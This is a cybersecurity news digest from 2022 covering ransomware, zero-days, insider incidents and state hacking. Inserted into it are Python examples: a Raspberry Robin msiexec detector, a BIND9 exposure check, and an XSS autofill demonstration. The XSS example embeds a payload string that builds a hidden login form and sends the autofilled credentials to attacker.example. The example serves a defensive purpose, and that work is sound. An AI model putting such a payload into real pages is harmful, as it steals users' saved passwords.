Google released Chrome v103.0.5060.114 for Windows users to patch an actively exploited zero-day (CVE-2022-2294). The vulnerability was described as a heap buffer overflow in Chrome’s WebRTC component and was found by Jan Vojtesek from security firm Avast last Friday.

AirTag abuse

Well, it has happened. A local Japanese gang has apparently put Apple AirTag devices on police cars to track them.

Russian govt on cyber-attacks

The Russian government said that while at the start of the war, cyber-attacks have disrupted the activity of many of its websites, the government and the private sector are getting better at stopping incoming attacks, especially DDoS attacks. [via Oleg Shakirov]

UK MPs call for Dahua and Hikvision ban

A group of 67 MPs has called on the UK government to formally ban the sale and use of Dahua and Hikvision CCTV cameras in the UK. Equipment made by the two companies has been linked to human rights abuses and intensive surveillance in China’s Xinjiang region.

NIST quantum-resistant encryption news

US NIST announced on Tuesday that it chose the first set of encryption tools, also known as quantum-resistant encryption algorithms, meant to protect sensitive data against an attack from a quantum computer. The four selected encryption algorithms are CRYSTALS-Kyber, CRYSTALS-Dilithium, FALCON, and SPHINCS+, and NIST said they would become part of the agency’s post-quantum cryptographic standard, expected to be finalized in the next two years.

GanjaMask

Cannabis ISAO, a security group inside the nascent US cannabis industry, published a report last week on GanjaMask, a threat actor targeting its members. Cannabis ISAO says GanjaMask runs a network of websites posing as US-based cannabis sellers. The role of these websites is to collect payments and payment card details from customers who place orders through the sites.

Academic research on Gozi

An academic study published earlier this year looked at the internal structure and operations of the Gozi cybercrime cartel.

AstraLocker releases decryption keys

The operators of the AstraLocker ransomware said they are shutting down their operation and have released free decryption keys for all their past victims. The gang told BleepingComputer they are now switching to running a crypto-mining botnet.

Malicious npm libraries

In a report published on Tuesday, ReversingLabs said it found 31 npm libraries that contained obfuscated JavaScript code that would steal web form data. The npm packages had been available on the npm portal for the past two months, and the vast majority were disguised to look like tools meant for manipulating and working with icon images. ReversingLabs said the libraries contained hidden code that would steal any data that users entered into forms on websites or mobile apps where the malicious libraries were accidentally included. The attack most likely targeted information entered in password fields and payment forms, data that threat actors could easily monetize.

Luna Moth

Security firm Sygnia has published a report on Luna Moth, a new threat actor that, since March this year, has been engaging in hack-and-extortion attacks. Sygnia said Luna Moth uses spear-phishing to infect victims with a remote access trojan, which it then uses to steal sensitive data that can be used in a future extortion attempt. The company reported that some extortion demands reached “millions of dollars.”

XFiles campaign

Threat intelligence company CyberInt said in a report on Sunday that it detected a malware distribution campaign spreading the XFiles infostealer trojan with documents weaponized with the Follina Office zero-day.

Chropex campaign

Broadcom’s Symantec team said it detected a rise in attacks distributing Chropex, a browser hijacker targeting macOS platforms that can monitor Safari searches and insert ads in web pages. Symantec said the Chropex group typically uses malvertising campaigns and drive-by downloads to distribute their payload.

New RedAlert ransomware

Security researchers also discovered a new ransomware operation this week. Named RedAlert, according to BleepingComputer, this group has tools that can encrypt both Windows systems and Linux-based VMware ESXi servers.

Hive ransomware

Microsoft has published a technical analysis of the Hive gang’s new Rust-based ransomware strain, which the group has been using in attacks since March this year.

VSingle

Japan’s CERT team has published a report on new versions of VSingle, a malware strain used by North Korean state-sponsored hackers, targeting both Windows and Linux users. This new report focuses on the updates to the Linux version, which has been updated to include a backup mechanism for obtaining command-and-control server information from GitHub repositories.

Bitter APT

Researchers from German security firm SECUINFRA have published a report on a campaign carried out by the Bitter APT against targets in Bangladesh. The campaign’s end goal was to infect victims with the Almond RAT.

Brute Ratel abuse

Palo Alto Networks said it identified a suspected APT29 campaign that abused Brute Ratel, an adversary emulation framework developed by a former Crowdstrike and Mandiant security engineer. The Brute Ratel author said they took actions against the licenses abused in these attacks, which they claim were sold on the black market.

https://twitter.com/NinjaParanoid/status/1544334653976641536

Konni targets Russia

Lumen’s Black Lotus Labs has published a report on a recent spear-phishing campaign aimed at Russian targets that it linked to Konni, a North Korea-based espionage group. The group previously targeted Russian government agencies earlier this year.

Windows Kerberos bug

James Forshaw of Google’s Project Zero has published a technical analysis about a vulnerability that allows remote code execution (CVE-2022-24545) and elevation of privilege (CVE-2022-30165) in the Windows Kerberos service. The vulnerability can be exploited in unpatched systems via CredSSP, a Windows protocol designed to securely forward authentication credentials between a client and a remote server in an internal network/domain.

OpenSSL bug

The OpenSSL project released a security update on Tuesday to fix several security flaws, including a vulnerability that, under certain scenarios, can lead to remote code execution on a small subset of OpenSSL servers.

EternalBlue, five years later

Five years after the WannaCry and NotPetya ransomware outbreaks, Jan Kopriva of ISC SANS says that the number of internet-connected systems vulnerable to the EternalBlue exploit has decreased by more than two-thirds.

The FBI Says People Are Applying to Jobs Using Deepfakes

We’ve heard of people hiring contractors to do their jobs for them, but now people are using AI to get the job in the first place. The specific technique being used was applying a skin during a video interview to look like someone else, and using voice spoofing software to make it sound different as well. A number of these were caught when the avatar’s mouth didn’t match the sound. I expect this is somewhat easy to catch right now, but that it’ll get much more difficult in just a year or two. Read more: FBI Says People Are Using Deepfakes to Apply to Remote Jobs

Data For 1 Billion Chinese Citizens Being Sold Online

An anonymous hacker appears to be selling a massive Chinese police database of over 1 billion people. Released sample data includes names, phone numbers, national ID numbers, and birth information. Other sample data included crimes people have been charged with, such as: looting, fraud, and handjobs. The dump is evidently 23 terabytes in total, and is being sold by a user named ChinaDan for around $200,000 (10 bitcoin). Read more: A Massive Police Database of Allegedly 1 Billion Chinese Citizens Is Being Sold Online

China Targeting Rare-Earth Companies with Influence Operations

Mandiant has found evidence of Chinese attackers running influence operations against companies competing with China in the rare-earth elements space. They’re launching influence campaigns to anger local residents and presumably harm their business and market share. Read more: Chinese Influence Op Tries to Undermine Western Rare Earth Firms

HackerOne Employee Fired for Stealing Bounties

A HackerOne employee has been fired for going through customers’ bounty submissions and submitting them as his own to earn money. This is pretty much the nightmare scenario for a company that’s based on trust, but it looks like they handled it as best as possible. Read more: HackerOne insider fired for trying to claim other people’s bounties

Indian Hacker Groups As a Service

Indian hacking groups are being used to target the law firms representing their clients’ opposition, essentially attempting to dig up dirt that can be used to discredit them in court. They also go after targets directly for the same purpose: finding dirt. It’s like a high-end call center service, but for finding leverage against people by hacking them. Obviously doing bad things is bad, but I think it’s an interesting business model. And the article is very in-depth. Read more: How mercenary hackers sway litigation battles

HackerOne discloses malicious insider incident, and nobody’s surprised

Three years ago, a Romanian vulnerability researcher accused employees of the HackerOne bug bounty platform of accessing bug reports he filed on the platform, taking his findings, and using them to file similar reports at other companies on the same platform—effectively stealing future profits.

At the time, the researcher did not provide any proof for his accusations, but once he went public, other researchers told similar tales. Nobody posted any proof, but everyone was telling the same story—of how HackerOne moderators would often mark and close a report as “informative,” claiming a vulnerability had no significant impact on a company, but once the researchers tried to submit the same “unique” bug against other HackerOne programs, their reports would be marked as “duplicates,” suggesting someone else had already filed a similar report before them.

Although no evidence that HackerOne employees were stealing bug reports for their own profits was ever posted, the rumors persisted throughout the years, mainly because everyone likes a good conspiracy theory.

But it’s not a theory anymore. In a report published late Friday, just ahead of the July 4th extended weekend, and hoping the incident would not get extended media coverage, HackerOne disclosed the first incident of a rogue employee stealing a researcher’s bug report.

Recounting the events following an internal investigation, HackerOne said that, on June 22, one of the companies that runs a bug bounty program on its platform complained that they received a vulnerability report through a separate channel that was similar to a bug submitted via its HackerOne program.

HackerOne’s customer said they took note of the report because the person who submitted this bug used “intimidating language,” in what’s most likely coded language and lawyer-speak for a suspected extortion attempt.

When HackerOne tried to dismiss the customer’s complaint with the classic excuse that “bug collisions and duplicates” can happen in the infosec industry, the customer “expressed skepticism that this was a genuine collision and provided detailed reasoning.”

To HackerOne’s credit, once the company was convinced of the customer’s valid complaint, it took less than a day to identify the rogue employee, block their access to HackerOne systems, and remotely lock their laptop.

HackerOne also said it reviewed the employee’s entire activity log from their two and a half months of employment and linked their identity to a second HackerOne account, which was used to collect bounty payments for bug reports the employee stole from other researchers.

The employee was fired on Thursday, and HackerOne said it has not decided if it would refer the case to law enforcement just yet.

In total, HackerOne said their former employee received payments from seven other companies, but this number could be larger, and asked companies to come forward if they received any communications from a researcher named “rzlr,” their former employee’s secondary sock-puppet account name.

Ransom payment back for a profit

Maastricht University in the Netherlands will get back the ransom it paid to hackers in 2019, and at a profit. The university paid €200,000 in Bitcoin three years ago, and it will receive that Bitcoin back after Dutch authorities traced the payment to a money launderer in Ukraine, who was detained last year. The upside is that the Bitcoin is now worth €500,000, which the university said it plans to put in a fund meant to help struggling students, according to Dutch newspaper de Volkskrant [non-paywalled version in NOS].

Sharp Boys leak

An Iranian hacking group named Sharp Boys has leaked the personal information of more than 300,000 Israeli citizens who signed up on travel agency websites. Leaked data includes ID numbers, addresses, and even payment card details. According to the Jerusalem Post, data from more than 20 websites was leaked, including hotel4u.co.il, hotels.co.il, isrotel.com, minihotel.co.il, trivago.co.il, and danhotels.com. According to the Times of Israel, all websites were operated by a company named Gol Tours LTD, and Israeli officials took a never-before-seen step of seizing all the company’s servers to have better access and investigate the intrusion.

DTEK hack

Ukrainian officials said that Russian hackers and their military forces appear to have coordinated once again this past week. Victor Zhora, head of Ukraine’s SSSCIP security agency, said that Russian hackers hit the network of Ukrainian power grid DTEK at the same time that Russian missiles hit the company’s thermal power plant in Kryvyi Rih. DTEK has also formally confirmed the incident in a statement. On Russia’s side, the DTEK hack was claimed by XakNet, a pro-Russian hacktivist group that many security experts say operates on the instructions of Russian intelligence services.

DNS hijack incident

Ankr, a company that provides server infrastructure for blockchain companies, disclosed a security breach on Friday, revealing that a threat actor social-engineered an employee of Gandi, its domain registrar, and used that access to tamper with Ankr’s DNS. The company said the attacker modified two nameserver entries in order to redirect traffic from two RPC endpoints to malicious versions. These two endpoints handled traffic for Polygon and the Fantom Foundation, two organizations that specialize in Ethereum-based infrastructure. Both confirmed the RPC infrastructure hijack but did not provide any details about the impact on their customers. A change made at the registrar bypasses every control on the servers themselves, which is why registrar account hygiene, registry locks, and monitoring of delegation changes belong in the threat model.

China to invest in its own OS

A group of ten Chinese tech companies has agreed to help Kylinsoft build a new project named openKylin, meant to improve the open-source development of Kylin, China’s national operating system. The move comes as western software companies, such as Microsoft and Apple, are pulling out of Russia and creating technical issues for the Russian government, which, just like China, is heavily dependent on US-made operating systems.

Azure AD now supports temporary passcodes

Microsoft has formally launched a new Azure AD feature called Temporary Access Pass. It lets administrators issue time-limited (and optionally single-use) passcodes to users, who can use them to set up a new account or regain access to one they are locked out of. Microsoft said the feature is aimed at companies that have moved their employees to passwordless sign-in, where users authenticate with hardware security keys, authenticator apps, or biometrics, and need a controlled way to let users register those methods or recover access to their accounts.

IT Army revelations

Stefan Soesanto, a cyber defense researcher from Switzerland and an expert in the activities of the IT Army of Ukraine [his PDF report here] said on Friday that ITAU members have admitted for the first time that they used a DDoS campaign against one of their targets as a distraction for a data exfiltration operation. The target was Russia’s e-procurement resource platform Roseltorg.

New pro-Russian hacktivist group

A new pro-Russian hacktivist group calling itself DeaDNet has taken credit for the wave of DDoS attacks that have hit Norway over the past week. The group now joins the ranks of similar hacktivist groups like KillNet and XakNet, although it’s unclear if they are just a front for Russian intelligence services, like the previous two.

New YDIO group

The former DarkLulz hacking group has rebranded as Your Data Is Ours (YDIO) and announced a series of coordinated attacks against companies located in BRICS countries (Brazil, Russia, India, China, and South Africa).

LockBit and Darkside connection

Emsisoft CTO Fabian Wosar says that large chunks of the LockBit 3.0 source code appear to have been copied from the now-defunct ransomware strains Darkside and BlackMatter.

One of the theories why we’re seeing this older code re-used in LockBit 3.0 is below:

Dark web trends shifts

After authorities seized several dark web marketplaces earlier this year, activity on carding marketplaces and underground forums saw a spike, according to a joint report from Agari and PhishLabs.

Raspberry Robin continues to spread

Microsoft told customers in a security alert last week to bolster their defenses against the Raspberry Robin malware, as the company has found infections with this new threat on the networks of hundreds of customers. Discovered by Red Canary last year, Raspberry Robin is a Windows worm that spreads through USB devices and often uses hacked QNAP NAS devices as command-and-control servers.
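
One way to hunt for this worm in process telemetry, as an added example that is not code from Microsoft, Red Canary, or this page: Raspberry Robin is publicly reported to launch msiexec.exe with a remote URL (often on a non-standard port) from a process chain that started on a removable drive, and the script below flags exactly that pattern over constructed Sysmon-style process-creation events. The event layout, the sample command lines, and the severity scoring are assumptions for illustration; the msiexec-with-URL indicator is the published behaviour, not something stated on this page.

```python
import re
from typing import Any, Dict, List, Optional

Event = Dict[str, Any]

# host and optional port of the first http(s) URL on a command line
URL_RE = re.compile(r"https?://([^\s\"'/:]+)(?::(\d+))?", re.IGNORECASE)
DRIVE_RE = re.compile(r"\b([A-Z]:)\\")

# Constructed process-creation events in a Sysmon Event ID 1 flavour; not real telemetry.
SAMPLE_EVENTS: List[Event] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /R "E:\setup.cmd"'},            # launched off a USB drive
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://nas.example.net:8080/rr/abc=1"},  # remote install
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\Downloads\tool-x64.msi"},   # benign local install
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def msiexec_remote_install(ev: Event) -> bool:
    """msiexec pulling its package from a URL is rare in managed fleets; treat it as a strong signal."""
    return basename(ev["image"]) == "msiexec.exe" and URL_RE.search(ev["cmdline"]) is not None


def references_removable_path(ev: Event, system_drive: str = "C:") -> bool:
    """Heuristic: the command line touches a drive letter other than the system drive."""
    drives = DRIVE_RE.findall(ev["cmdline"].upper())
    return any(d != system_drive.upper() for d in drives)


def detect(events: List[Event], system_drive: str = "C:") -> List[Dict[str, Any]]:
    """Return one alert per msiexec-from-URL event, enriched with its ancestry."""
    by_pid = {e["pid"]: e for e in events}
    hits: List[Dict[str, Any]] = []
    for ev in events:
        if not msiexec_remote_install(ev):
            continue
        m = URL_RE.search(ev["cmdline"])
        host, port = m.group(1), m.group(2) or "80"
        parent: Optional[Event] = by_pid.get(ev["ppid"])
        hit: Dict[str, Any] = {
            "pid": ev["pid"], "host": host, "port": port,
            "parent": basename(parent["image"]) if parent else None,
            "removable_ancestor": False,
        }
        # Walk a few hops up the tree looking for a launch from removable media.
        p = parent
        for _ in range(4):
            if p is None:
                break
            if references_removable_path(p, system_drive):
                hit["removable_ancestor"] = True
                break
            p = by_pid.get(p["ppid"])
        odd_port = port not in ("80", "443")
        hit["severity"] = "high" if hit["removable_ancestor"] or odd_port else "medium"
        hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The URL host is returned as a field rather than matched against a QNAP indicator list because the C2 hosts rotate; a practitioner would join it against their own threat intel or simply review every msiexec install from the internet, which should be close to zero in a managed environment.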

SolidBit and CryptOn

Researchers from the S2W Talon team have spotted two cybercrime groups using branding similar to that of LockBit, a well-known and successful ransomware operation. The first is named SolidBit, and while its code appears to be based on the Yashma ransomware, its logo and payment site mimic LockBit’s style. The second is named CryptOn, and while it has not been confirmed to be an actual ransomware operation, its leak site is almost identical to the one used by LockBit.

Bind9 vulnerabilities

An internet scan carried out by researchers from security firm SpiderSilk found that more than 315,000 DNS servers run BIND9 versions affected by CVE-2021-25220. Disclosed in March, the flaw can be used to poison the cache of a resolver that is configured to use forwarders (resolvers that recurse on their own are not affected), after which the resolver hands the bad answers to all of its clients.
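
A triage check for this finding, as an added example that is not code from SpiderSilk, ISC, or this page: it parses a BIND version banner (from `named -v` or a `version.bind` CHAOS query), compares it with the per-branch fix levels from ISC’s advisory for CVE-2021-25220 (9.11.37, 9.16.27 and 9.18.1, which the page does not list and which you should confirm against ISC), and then checks whether named.conf actually configures forwarders, since without forwarding the affected version is not exposed to this particular bug. The sample banner and configuration are constructed.

```python
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# Last affected patch level per BIND 9 branch, from ISC's advisory for CVE-2021-25220
# (fixed in 9.11.37, 9.16.27 and 9.18.1; 9.17 was a development branch).
# Assumption for this example: verify these numbers against ISC before relying on them.
LAST_AFFECTED_PATCH = {11: 36, 16: 26, 17: 22, 18: 0}

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_bind_version(banner: str) -> Optional[Version]:
    """Extract major.minor.patch from `named -v` output or a version.bind TXT answer."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def version_affected(version: Version) -> bool:
    """True if this release predates the fix on its branch."""
    major, minor, patch = version
    if major != 9:
        return False
    if minor in LAST_AFFECTED_PATCH:
        return patch <= LAST_AFFECTED_PATCH[minor]
    # Branches the advisory does not list (9.12 to 9.15) are end-of-life and never
    # received a fix; treat anything older than 9.18 as affected and newer as fixed.
    return minor < 18


def uses_forwarders(named_conf: str) -> bool:
    """True if named.conf enables forwarding, the precondition for this bug.

    Comments are stripped first (BIND accepts //, # and /* */ comments), so a
    commented-out block does not count, and an empty `forwarders { };`, which
    turns forwarding off, does not count either.
    """
    text = re.sub(r"/\*.*?\*/", "", named_conf, flags=re.S)
    text = re.sub(r"(//|#).*", "", text)
    return re.search(r"\bforwarders\s*\{[^}]*\d", text) is not None


def assess(banner: str, named_conf: str) -> str:
    version = parse_bind_version(banner)
    if version is None:
        return "unknown"
    if not version_affected(version):
        return "fixed"
    return "vulnerable" if uses_forwarders(named_conf) else "affected-but-not-exposed"


# Constructed sample inputs, not taken from any real server.
SAMPLE_BANNER = "BIND 9.16.26-Debian (Extended Support Version) <id:2e2f3e6>"
SAMPLE_NAMED_CONF = """
options {
    directory "/var/cache/bind";
    // forwarders { 192.0.2.53; };   commented out, must not count
    forwarders { 198.51.100.1; 2001:db8::53; };
};
"""

if __name__ == "__main__":
    print(parse_bind_version(SAMPLE_BANNER), assess(SAMPLE_BANNER, SAMPLE_NAMED_CONF))
```

Many distributions backport fixes without bumping the upstream version, so a banner-only verdict is a starting point for patch verification, not proof of exposure; the forwarders check is what separates "old version" from "old version in the vulnerable configuration".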

DFSCoerce micro-patches

Security firm ACROS has released a micro-patch for the DFSCoerce vulnerability, which Microsoft said it wouldn’t fix. Mitja Kolsek, co-founder and CEO of ACROS Security, told Risky Biz News that his company now has micro-patches for all four major NTLM relay attacks disclosed over the past year that Microsoft classified as “won’t-fix” issues. This includes RemotePotato0, PetitPotam, PrinterBug/SpoolSample, and DFSCoerce.

Half of 2022’s zero-days are variants of older vulnerabilities

If you lurk around enough security people and if you read enough infosec write-ups, at one point or another, you are going to run across the phrase “make 0-day hard.”

If that sounds familiar, it’s because the phrase is the unofficial motto of Project Zero, which is Google’s most (in)famous security team, tasked with finding, tracking, and studying software vulnerabilities.

While Project Zero researchers have a broad range of responsibilities, one of their initial undertakings was to track the use of zero-days (previously unknown software vulnerabilities) in attacks that take place in the real world, studying their root cause, and then trying to spot if certain attacks can be prevented by working with vendors on fixing a particular bug class.

Since 2019, this job has primarily fallen to Maddie Stone, a San Francisco-based security engineer who joined Project Zero from Android’s security team. Her name is on most root cause analysis (RCA) reports published by the P0 team over the past few years, and you’ll regularly find Stone presenting her and Project Zero’s work at security conferences every few months.

Stone and Project Zero’s work on putting together highly detailed RCA reports has greatly contributed to making vendors and other security researchers aware of the fact that, in many cases, software vendors take the easy way out and release patches that block a particular attacker’s exploit code but do not fix the underlying issue in the software’s code or in how the software was designed to work.

This has led to situations where threat actors study the vendor’s patch, find a new way to exploit the underlying issue, and launch new attacks with a new variant of the same zero-day.

While Stone touched on this issue briefly in the past, in a report published in April that analyzed the zero-days deployed in the wild throughout 2021 and in another report about the zero-days exploited in 2020, she now has new numbers to paint a fresh picture of this old problem.

In a new report published on Thursday, Stone said that 9 of the 18 zero-day vulnerabilities that were detected being used in the wild in the first half of 2022 have been variants of older vulnerabilities.

“At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests,” Stone said.

“On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.”

Stone argues that vendors should do more root cause analysis of their own. First, because it helps the security industry; second, because it helps the company’s own developers too; but third, and most important, because it makes an attacker’s job harder and may delay future attacks.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.

OpenSea malicious insider

OpenSea, today’s largest NFT marketplace, has suffered a malicious insider incident. The company said that an employee of Customer.io, its email delivery vendor, misused their access to download the email addresses of OpenSea users who signed up for the marketplace’s newsletter.

Walmart denies ransomware attack

US retail giant Walmart has denied getting hit by a ransomware attack. The company’s name had been recently listed on the leak site of the Yanluowang ransomware gang, with the group claiming to have encrypted between 40,000 and 50,000 of the retailer’s systems.

Harmony hack linked to North Korea

Experts from blockchain tracking company Elliptic have linked the $100 million hack of the Harmony inter-blockchain bridge to North Korean state-sponsored hackers. The finding is terrible news for the platform’s customers, as it is now highly unlikely that the attackers would return any of the stolen funds. According to blockchain security firm PeckShield, the attackers have already laundered roughly $36 million of the stolen funds. In the meantime, Harmony has increased its bounty for information on the attackers from $1 million to $10 million, a sum it is also willing to offer the attackers themselves to return the stolen funds. Fat chance, though!

DDoS attacks hit Norway

The Norwegian National Security Authority blamed a series of large DDoS attacks against Norwegian companies on Tuesday on “a pro-Russian criminal group.”

Geographic Solutions incident

A cyberattack has disrupted the operations of Geographic Solutions, a Florida-based company that provides unemployment-claims and job-placement systems for several US state governments. NBC News reports that the incident has impacted services provided by departments of labor and related agencies in at least nine states, as well as the DC area.

Macmillan ransomware incident

Macmillan, one of the Big Five publishers of English-language content, has been hit by ransomware, according to a report from Publishers Weekly. The incident appears to have taken place over the weekend, and the company said that some services might be affected while it works to restore systems.

Google goes after YouTube scams

Google said on Thursday that it plans to remove the option for YouTube channel owners to hide their subscriber counts as a measure to fight spam on the platform. The measure is meant to fight a recent trend where threat actors are creating accounts mimicking legitimate ones and running various scams to defraud users. The idea is to show subscriber numbers at all times, which would allow regular users to differentiate between a legitimately popular account and a scammy one with almost no followers. [Read the full report in TechCrunch]

Chrome Password Manager updates

Google has rolled out a series of updates to the Chrome Password Manager. New features include grouping passwords for the same sites and apps together, the possibility of adding a home screen shortcut for the password manager utility, the ability to easily fix weak or compromised passwords, the possibility to manually add passwords to the manager, and a unified user interface across all platforms.

Coordinated action against Google

Ten consumer groups, under the coordination of the European Consumer Organisation (BEUC), have filed complaints with data protection agencies in their countries against Google for using misleading language and design choices that funnel users towards its “surveillance systems.” BEUC said complaints had been filed in France, the Czech Republic, Norway, Greece, and Slovenia.

Israel warned US about power grid attacks

The Commander of Israel’s vaunted IDF Unit 8200, the country’s SIGINT agency, told Israeli media this week that his team warned the US of attempts from Iranian hackers to attack US power plants. Col. U., as he is identified, said they discovered the plot while investigating attacks on its water facilities last year.

RCMP admits to using spyware

Officials from Canada’s Royal Canadian Mounted Police admitted for the first time that they used spyware in past investigations. The tools were used by the RCMP’s CAIT (Covert Access and Intercept Team) in 10 past operations, dating as far back as 2018, according to a document shared by the agency with the Canadian Parliament last week. Officials said they resorted to intrusive spyware because targets switched to encrypted communication channels and wiretaps became ineffective.

NATO to create cyber rapid response force

At the recent NATO members conference in Madrid, Spain, the Alliance announced plans to create a rapid response cyber force team so members can respond faster to “significant malicious cyber activities.” [Additional coverage in Cyberscoop]

UK removes Chinese-made cameras

The UK Department of Work and Pensions has banned the use and purchase of Chinese-made security cameras. Current cameras will be replaced over the next three years. The UK DWP now becomes the second UK government agency to ban Chinese-made cameras after the UK Department of Health and Social Care, according to the SCMP.

Uber CISO case

A US judge expanded the legal case against Joseph Sullivan, the former Uber CISO, to also include wire fraud charges over his alleged role in trying to cover up a 2016 hacking that exposed the personal information of 57 million passengers and drivers, Reuters reported.

Ukraine phishing gang arrest

Ukraine’s Cyber Police detained this week nine suspects that were part of a cybercrime group that ran more than 400 phishing sites. Most of the phishing sites mimicked EU websites offering financial assistance to Ukrainians. Officials said the gang stole an estimated 100 million hryvnias from their victims, worth around $3.4 million.

8220 gang

Microsoft has a Twitter thread on the recent activities of the 8220 Gang, a cryptocurrency-mining group active since early 2021. Microsoft says the group has been recently seen exploiting vulnerabilities like CVE-2022-26134 (Confluence) and CVE-2019-2725 (WebLogic) for initial access against Linux systems, confirming similar observations from Check Point earlier this month.

Threat actor unmasked

A Romanian security researcher has delved into the workings of a recent phishing campaign mimicking the Romanian ANAF (National Agency for Fiscal Administration) and linked it to a threat actor based in Brazil.

Hacker-for-hire scene, international outlook

Google’s TAG team has published an overview of the hacker-for-hire scenes in India (Appin and Belltrox), Russia (Void Balaur), and UAE. According to Google, the UAE group is particularly interesting because they are linked to the original developers of H-Worm, a malware strain also known as njRAT, and some of their campaigns have been documented as far back as 2018. As part of its report, Google also added more than 30 domains used by these companies to its Safe Browsing API, so users receiving emails or navigating to the sites will now receive security alerts.

Hacker-for-hire scene, Indian scene

Reuters investigative reporters Raphael Satter and Christopher Bing have published an in-depth piece on the activities of several India-based hacker-for-hire companies—such as Appin, BellTroX, and CyberRoot—that have breached lawyers & litigants on behalf of Western private eye firms.

YTStealer

Intezer’s Joakim Kennedy took a deep dive into YTStealer, a new infostealer that has been specifically designed to steal YouTube account authentication cookies and has been used solely in targeted attacks against YouTube account owners. One of the malware’s most innovative features is that YTStealer also navigates to the account owner’s YouTube Studio page, from where it grabs information about the user’s channels, such as the channel name, how many subscribers it has, how old it is, whether it is monetized, whether it is an official artist channel, and whether the name has been verified.

MedusaLocker

CISA, the FBI, FinCEN, and the US Treasury have released a security advisory on the MedusaLocker ransomware. The agencies said the ransomware gang behind MedusaLocker has been active as recently as May 2022, and the gang has heavily relied on vulnerabilities in the Windows RDP service for initial access to victims’ networks.

SessionManager IIS backdoor

Security researchers from Kaspersky have discovered a new IIS backdoor trojan that they named SessionManager. Researchers said SessionManager has been used against NGOs, government, military, and industrial organizations in Africa, South America, Asia, Europe, Russia, and the Middle East, starting from at least March 2021. Kaspersky said the malware appears to be a variant of the older OwlProxy backdoor and is most likely the work of the Gelsemium threat actor.

Toll fraud malware

Microsoft has a report out on what it calls “toll fraud malware,” also known as WAP billing or premium number schemes.

New stealer detected

Broadcom’s security team said it discovered a new infostealer named RecordStealer being used in the wild. An AhnLab report also has some details about this new malware strain.

Black Basta

A Trend Micro report details new tactics employed by Black Basta affiliates, who are now using the QakBot trojan for initial access into corporate networks and the PrintNightmare vulnerability to expand their access.

FluBot trojan

Fox-IT researchers have published a technical report on the history and evolution of the FluBot Android banking trojan, a botnet that was recently seized with the help of Europol. The researchers found that FluBot relied heavily on servers located in the Netherlands, and they do not rule out a FluBot comeback if its operators move future infrastructure to “safer” hosting companies.

Cryptocurrency crash

Blockchain tracking companies like Chainalysis and TRM Labs have told Reuters that the recent and sudden crash in cryptocurrency values has wiped out tens of millions from North Korea’s caches of stolen cryptocurrency. For example, a North Korean cache of stolen funds lost about 80-85% of its value from last year and is now worth less than $10 million.

Chinese espionage

A Financial Times investigation found that members of the APT40 cyber-espionage group have lured Chinese students who spoke good English into working as translators for a front company that secretly and unbeknownst to them had them translate hacked documents or material needed for target reconnaissance. The FT said APT40 employed more than 140 students in this scheme, which operated out of the island of Hainan, where the Department of Justice and Intrusion Truth previously linked APT40’s base of operation.

XSS bug can steal your browser credentials

Researchers from GoSecure have found that the autofill feature in browsers like Chrome, Edge, Firefox, Opera, and Internet Explorer can be abused to steal the credentials a user has saved for a site, provided that site is also vulnerable to some sort of cross-site scripting (XSS) bug: the injected script plants a login form for the same origin, the browser fills it in, and the script reads the values out.
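
To make the dependency on the XSS bug concrete, here is an added example (not code from GoSecure or this page) showing the vulnerable rendering path beside its hardened form, plus a small canary check a defender can run over rendered pages. The page template, the attacker payload (an off-screen form that a password manager would autofill for the origin, followed by a script that reads it), and the field names are all constructed for illustration; the script in the payload is just a string here and never executes.

```python
import html
from html.parser import HTMLParser
from typing import Iterable, List

# Constructed attacker payload for a reflected XSS sink: an off-screen login form
# that a browser password manager may autofill for this origin, plus a script that
# reads the filled values and sends them off. It is only a string here.
INJECTED_FORM = (
    '<form id="x" style="position:absolute;left:-9999px">'
    '<input name="username"><input name="password" type="password"></form>'
    '<script>setTimeout(function(){fetch("https://attacker.example/?u="'
    '+encodeURIComponent(document.querySelector("#x [name=username]").value)'
    '+"&p="+encodeURIComponent(document.querySelector("#x [name=password]").value)'
    ')},1000)</script>'
)

# Constructed page template: a search results page that also carries the site's real login form.
PAGE = "<html><body><h1>Search</h1><p>Results for: {query}</p>{login}</body></html>"
LEGIT_LOGIN = ('<form action="/login" method="post">'
               '<input name="user"><input name="pass" type="password"></form>')


def render_unsafe(query: str) -> str:
    """Vulnerable: user-controlled text is concatenated into the HTML unencoded."""
    return PAGE.format(query=query, login=LEGIT_LOGIN)


def render_safe(query: str) -> str:
    """Hardened: HTML-encode the value for the text-node context it lands in."""
    return PAGE.format(query=html.escape(query, quote=True), login=LEGIT_LOGIN)


class _PasswordInputs(HTMLParser):
    """Collects the name attribute of every <input type=password> in a document."""

    def __init__(self) -> None:
        super().__init__()
        self.names: List[str] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.names.append(a.get("name") or "")


def password_fields(doc: str) -> List[str]:
    """Names of every password input the browser (and its autofill) would see."""
    p = _PasswordInputs()
    p.feed(doc)
    return p.names


def unexpected_password_fields(doc: str, expected: Iterable[str] = ("pass",)) -> List[str]:
    """Canary check for a rendered page: any password input that is not the site's own."""
    allowed = set(expected)
    return [n for n in password_fields(doc) if n not in allowed]


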